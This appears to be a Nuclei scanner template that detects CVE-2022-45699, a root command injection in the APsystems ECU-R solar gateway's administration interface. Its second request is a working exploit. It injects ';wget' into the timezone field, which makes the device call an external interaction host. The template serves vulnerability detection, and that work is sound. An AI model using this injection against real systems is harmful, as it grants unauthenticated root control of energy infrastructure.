id: CVE-2022-45699 info: name: APsystems ECU-R Firmware - Command Injection author: pussycat0x severity: critical description: | Command injection in the administration interface in APSystems ECU-R version 5203 allows a remote unauthenticated attacker to execute arbitrary commands as root using the timezone parameter. impact: | Unauthenticated attackers can execute arbitrary commands with root privileges through the timezone parameter in the administration interface, potentially compromising the entire solar power management system and connected infrastructure. remediation: | Upgrade APsystems ECU-R firmware to a patched version that properly sanitizes the timezone parameter and validates input to prevent command injection. reference: - https://github.com/0xst4n/APSystems-ECU-R-RCE-Timezone classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-45699 cwe-id: CWE-78,CWE-94 epss-score: 0.76041 epss-percentile: 0.9947 cpe: cpe:2.3:o:apsystems:ecu-r_firmware:5203:*:*:*:*:*:*:* metadata: vendor: apsystems product: ecu-r_firmware tags: cve,cve2022,rce,apsystems,vkev,vuln flow: http(1) && http(2) http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} matchers: - type: word part: body words: - "Altenergy Power Control Software" internal: true - raw: - | POST /index.php/management/set_timezone HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded timezone=;wget+{{interactsh-url}};# matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - type: status status: - 200 # digest: 4a0a0047304502201b981d76623a2ff421cc242a24656fb4d7150b8b7ae18fe35cec2bdc69f64f2202210090caaefe5f909ded5ca0e4dc7c7db3559048e017622c2878111ad4e32a3922ef:922c64590222798bb761d5b6d8e72950